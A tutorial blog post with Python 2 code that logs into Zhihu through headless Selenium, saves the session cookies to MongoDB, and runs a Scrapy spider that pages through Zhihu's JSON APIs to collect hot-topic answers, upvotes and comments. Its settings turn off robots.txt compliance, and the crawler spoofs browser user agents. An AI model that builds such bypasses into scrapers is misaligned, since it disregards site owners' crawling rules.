Today I will show you how to scrape Zhihu's hot-topics section and collect the title, content, author, user comments, upvote count, and other information for each entry. With this data you can extract whatever you need for analysis and visualization, or build your own site to display the collected content. First, we log in with Selenium and save the login cookies to MongoDB:
# -*- coding: utf-8 -*-
import sys
import time
import pymongo
from selenium import webdriver

# Python 2: avoid UnicodeEncodeError when printing Chinese text
reload(sys)
sys.setdefaultencoding("utf-8")

if __name__ == '__main__':
    # Connect to MongoDB and select the database/collection that will hold the cookies
    client = pymongo.MongoClient(host="mongodb://192.168.98.5:27017")
    dbs = client["zhihu"]
    table = dbs["cookies"]
    # ChromeOptions is a convenient class for controlling Chrome's startup options
    option = webdriver.ChromeOptions()
    # Run in headless mode
    option.add_argument("--headless")
    # The Chrome docs recommend this flag to work around a headless-mode bug
    option.add_argument("--disable-gpu")
    # Disable the sandbox
    option.add_argument("--no-sandbox")
    # Run in a single process
    option.add_argument("--single-process")
    # Set the window size
    option.add_argument("--window-size=414,736")
    # Set the user agent
    option.add_argument("user-agent='Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'")
    browser = webdriver.Chrome(chrome_options=option)
    try:
        browser.get("https://www.zhihu.com/signin")
        browser.find_element_by_css_selector(".SignFlow-accountInput.Input-wrapper input").send_keys(
            "your-zhihu-account")
        time.sleep(1)
        browser.find_element_by_css_selector(".SignFlow-password input").send_keys(
            "your-zhihu-password")
        time.sleep(2)
        browser.find_element_by_css_selector(
            ".Button.SignFlow-submitButton").click()
        time.sleep(3)
        zhihu_cookies = browser.get_cookies()
        cookie_dict = {}
        for cookie in zhihu_cookies:
            cookie_dict[cookie['name']] = cookie['value']
        table.insert(cookie_dict)
        print "cookies inserted successfully"
        browser.close()
    except Exception as e:
        zhihu_cookies = browser.get_cookies()
        cookie_dict = {}
        for cookie in zhihu_cookies:
            cookie_dict[cookie['name']] = cookie['value']
        print cookie_dict
        browser.close()
        print e
ChromeOptions is the Selenium class used to configure Chrome at launch time: adding command-line arguments, blocking image loading, disabling JavaScript execution, and similar settings are all done through it.
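For instance, blocking image loading can also be done through Chrome's content-setting preferences instead of a command-line flag. The snippet below is a hedged sketch, not part of the original script; the preference key is a standard Chrome profile setting, but verify it against your Chrome and Selenium versions.

# Sketch: ChromeOptions with image loading disabled (value 2 = block)
from selenium import webdriver

option = webdriver.ChromeOptions()
option.add_argument("--headless")
option.add_experimental_option(
    "prefs", {"profile.managed_default_content_settings.images": 2})
browser = webdriver.Chrome(chrome_options=option)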
The code above connects to MongoDB, creates the database and collection, then drives Chrome through Selenium to visit Zhihu like a real browser: it locates the input boxes, submits the account and password, and reads the resulting cookies. The cookies are stored in the designated MongoDB collection so that the crawler can load and attach them when it sends its requests.
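Before writing the crawler, you can sanity-check the stored cookies by loading them back from MongoDB and attaching them to a plain requests call. This is only a hedged sketch: the Mongo host, database, and collection names match the script above, and it assumes the login script has already stored one cookie document.

# Sketch: load the saved cookies from MongoDB and reuse them with requests
import pymongo
import requests

client = pymongo.MongoClient(host="mongodb://192.168.98.5:27017")
saved = client["zhihu"]["cookies"].find_one()  # assumes one cookie document exists
cookies = {k: v for k, v in saved.items() if k != "_id"}

headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 "
                         "(KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36"}
resp = requests.get("https://www.zhihu.com/hot", cookies=cookies, headers=headers)
# Valid cookies keep us on /hot; an expired login usually redirects to /signin.
print("status: {0}, final url: {1}".format(resp.status_code, resp.url))

With the cookies confirmed, the Scrapy project is configured through the following settings.py entries: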
ROBOTSTXT_OBEY = False
LOG_LEVEL = "WARNING"
MONGO_URI = 'mongodb://xxx.xxx.xx.x:27017'
MONGODB_DBNAME = 'zhihu'
MONGODB_DBTABLE = 'zh_data'
MONGODB_COOKIE = 'cookies'
DOWNLOAD_DELAY = 0.8
The spider then reads these settings and does the actual crawling:
# -*- coding: utf-8 -*-
import json
import re
import sys
from copy import deepcopy

import pymongo
import scrapy

from zhihu import settings

# Python 2: avoid UnicodeEncodeError when printing Chinese text
reload(sys)
sys.setdefaultencoding('utf8')


class ZhihuSpider(scrapy.Spider):
    name = "zh"
    allowed_domains = ["www.zhihu.com"]
    start_urls = ['https://www.zhihu.com/']  # not used directly; start_requests below issues the first request
    # entry point: the hot-topics page
    start_url = "https://www.zhihu.com/hot"
    # request url for the first page of answers under a question (the include parameter selects the returned fields)
    question_detail_url = "https://www.zhihu.com/api/v4/questions/{0}/answers?include=data%5B%2A%5D.is_normal%2Cadmin_closed_comment%2Creward_info%2Cis_collapsed%2Cannotation_action%2Cannotation_detail%2Ccollapse_reason%2Cis_sticky%2Ccollapsed_by%2Csuggest_edit%2Ccomment_count%2Ccan_comment%2Ccontent%2Ceditable_content%2Cvoteup_count%2Creshipment_settings%2Ccomment_permission%2Ccreated_time%2Cupdated_time%2Creview_info%2Crelevant_info%2Cquestion%2Cexcerpt%2Crelationship.is_authorized%2Cis_author%2Cvoting%2Cis_thanked%2Cis_nothelp%3Bdata%5B%2A%5D.mark_infos%5B%2A%5D.url%3Bdata%5B%2A%5D.author.follower_count%2Cbadge%5B%2A%5D.topics&limit=5&offset={1}&sort_by=default"
    # request url for the comments under an article (non-question hot entries)
    q_detail_url = "https://www.zhihu.com/api/v4/articles/{0}/comments?include=data%5B*%5D.author%2Ccollapsed%2Creply_to_author%2Cdisliked%2Ccontent%2Cvoting%2Cvote_count%2Cis_parent_author%2Cis_author%2Calgorithm_right&order=normal&limit=20&offset=0&status=open"
    headers = {
        "HOST": "www.zhihu.com",
        "Referer": "https://www.zhihu.com",
        'User-Agent': "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) "
                      "Chrome/68.0.3440.106 Safari/537.36"
    }

    def __init__(self, param=None, *args, **kwargs):
        super(ZhihuSpider, self).__init__(*args, **kwargs)
        client = pymongo.MongoClient(host=settings.MONGO_URI)
        dbs = client[settings.MONGODB_DBNAME]
        # collection that will hold the scraped data
        self.table = dbs[settings.MONGODB_DBTABLE]
        # load the cookies saved by the selenium login script (drop Mongo's _id field)
        saved = dbs[settings.MONGODB_COOKIE].find_one()
        self.cookie_dict = {k: v for k, v in saved.items() if k != "_id"} if saved else {}

    def parse(self, response):
        section_list = response.xpath("//section[@class='HotItem']")
        for section in section_list:
            url = section.xpath(".//div[@class='HotItem-content']/a/@href").extract_first()
            title = section.xpath(".//div[@class='HotItem-content']/a/@title").extract_first()
            question_id = url.split("/")[-1]
            if "question" in url:
                # question-type entry: fetch its answers through the questions API
                detail_url = self.question_detail_url.format(question_id, 5)
                yield scrapy.Request(
                    detail_url,
                    callback=self.parse_detail,
                    meta={"meta": deepcopy(url)}
                )
            else:
                # article-type entry: fetch its comments through the articles API
                detail_url = self.q_detail_url.format(question_id)
                yield scrapy.Request(
                    detail_url,
                    callback=self.q_parse_detail,
                    meta={"url": deepcopy(url), "title": title}
                )

    def parse_detail(self, response):
        question_url = response.meta["meta"]
        all_dict = json.loads(response.text)
        data_dict = all_dict["data"]
        for data in data_dict:
            item1 = {}
            item1["question_url"] = question_url
            item1["title"] = data["question"]["title"]
            item1["content"] = data["content"]
            item1["comment_count"] = data["comment_count"]
            item1["voteup_count"] = data["voteup_count"]
            # keep only Chinese characters (CJK range \u4e00 to \u9fa5)
            p2 = re.compile(u'[^\u4e00-\u9fa5]')
            item1["content"] = p2.sub(r'', item1["content"])
            print "===========>question_url:{0}".format(question_url)
            print "===========>title:{0}".format(item1["title"])
            print "===========>upvotes:{0}".format(item1["voteup_count"])
            print "===========>comment count:{0}".format(item1["comment_count"])
            print "===========>content:{0}".format(item1["content"])
            # self.table.insert(item1)
        paging = all_dict["paging"]
        if not paging["is_end"]:
            next_url = paging["next"]
            yield scrapy.Request(
                next_url,
                self.parse_detail,
                meta={"meta": deepcopy(question_url)}
            )

    def q_parse_detail(self, response):
        question_url = response.meta["url"]
        title = response.meta["title"]
        all_dict = json.loads(response.text)
        data_dict = all_dict["data"]
        for data in data_dict:
            content = data["content"]
            comment_count = 0
            vote_count = data["vote_count"]
            # keep only Chinese characters (CJK range \u4e00 to \u9fa5)
            p2 = re.compile(u'[^\u4e00-\u9fa5]')
            content = p2.sub(r'', content)
            item2 = {}
            item2["question_url"] = question_url
            item2["title"] = title
            item2["voteup_count"] = vote_count
            item2["comment_count"] = comment_count
            item2["content"] = content
            print "===========>question_url:{0}".format(question_url)
            print "===========>title:{0}".format(title)
            print "===========>upvotes:{0}".format(vote_count)
            print "===========>comment count:{0}".format(comment_count)
            print "===========>content:{0}".format(content)
            # self.table.insert(item2)
        paging = all_dict["paging"]
        if not paging["is_end"]:
            next_url = paging["next"]
            yield scrapy.Request(
                next_url,
                self.q_parse_detail,
                meta={"url": deepcopy(question_url), "title": deepcopy(title)}
            )

    def start_requests(self):
        # attach the cookies loaded from MongoDB to the very first request
        return [scrapy.Request(url=self.start_url, dont_filter=True,
                               cookies=self.cookie_dict, headers=self.headers)]
The code above is straightforward. Scrapy's first request comes from start_requests: the engine takes the https://www.zhihu.com/hot request from the spider and hands it to the scheduler, which enqueues it. The scheduler returns the queued request to the engine, and the engine passes it to the downloader; in the downloader middleware you can attach cookies, a user agent, a proxy, and so on to the request. The downloaded response is then returned to the spider's parse method, which yields new URLs, and the cycle repeats.
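Although this project attaches the cookies directly in start_requests, the same thing can be done in a downloader middleware so that every outgoing request carries them. The sketch below is illustrative only: the class name, module path, and the priority 543 are assumptions, and the middleware would have to be registered in DOWNLOADER_MIDDLEWARES.

# middlewares.py -- minimal sketch, reusing the settings module shown above.
# Enable it in settings.py, for example:
# DOWNLOADER_MIDDLEWARES = {"zhihu.middlewares.ZhihuCookieMiddleware": 543}
import random
import pymongo
from zhihu import settings

class ZhihuCookieMiddleware(object):
    user_agents = [
        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36",
        "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36",
    ]

    def __init__(self):
        client = pymongo.MongoClient(host=settings.MONGO_URI)
        dbs = client[settings.MONGODB_DBNAME]
        saved = dbs[settings.MONGODB_COOKIE].find_one()
        self.cookies = {k: v for k, v in saved.items() if k != "_id"} if saved else {}

    def process_request(self, request, spider):
        # attach the saved cookies and a random user agent to every outgoing request
        request.cookies = self.cookies
        request.headers["User-Agent"] = random.choice(self.user_agents)
        return None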
The crawl starts by visiting Zhihu's hot-topics page, https://www.zhihu.com/hot; see the parse method. It first collects the hyperlinks in the hot list, then extracts from each link the id of the question or article, which is used later to fetch that entry's comments, upvotes, and so on. Note that there are two kinds of links: question links and hot-topic article links, and each kind is handled separately before its detail request is issued. The class attributes question_detail_url and q_detail_url are the two initial JSON API URL templates.
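To make the two cases concrete, here is a tiny hedged example of how the id is pulled out of each kind of link; both hrefs below are made up.

# Hypothetical hrefs from the hot list; real ids will differ.
question_href = "https://www.zhihu.com/question/297715922"
article_href = "https://zhuanlan.zhihu.com/p/123456789"

print(question_href.split("/")[-1])  # "297715922" -> fills question_detail_url
print(article_href.split("/")[-1])   # "123456789" -> fills q_detail_url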
Under each link the content is loaded as JSON: as you scroll down, new data keeps being fetched. If you open Chrome's developer tools while scrolling, you will see these requests under the XHR filter of the Network panel.
Once you know this URL, the response it returns tells you the next URL to visit; all you have to do is extract it and request it. A sample of the JSON data:
{"paging":{"is_end":true,"is_start":true,"next":"https://www.zhihu.com/answers/516374549/concerned_upvoters?limit=10\u0026offset=10","previous":"https://www.zhihu.com/answers/516374549/concerned_upvoters?limit=10\u0026offset=0","totals":0},"data":[]}
This JSON gives us the paths of the next and previous pages and tells us whether we have reached the last page: keep following the URL in the next field, and stop once the is_end field is true, which means all the data has been fetched. With the extraction rules in place, you can save the data to the database of your choice, and the crawler is complete. Thanks for reading, and feel free to ask questions!
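As a closing aside, the same follow-the-next-URL logic can be exercised outside Scrapy with a plain requests loop. This is only a hedged sketch: api_url stands for a filled-in question_detail_url, and the cookies and headers are assumed to be the ones saved earlier; nothing here is part of the original project.

# Sketch: follow paging["next"] until paging["is_end"] becomes true.
import json
import requests

def fetch_all_answers(api_url, cookies, headers):
    results = []
    url = api_url
    while True:
        resp = requests.get(url, cookies=cookies, headers=headers)
        payload = json.loads(resp.text)
        results.extend(payload["data"])
        paging = payload["paging"]
        if paging["is_end"]:      # true on the last page -> stop
            break
        url = paging["next"]      # otherwise keep following "next"
    return results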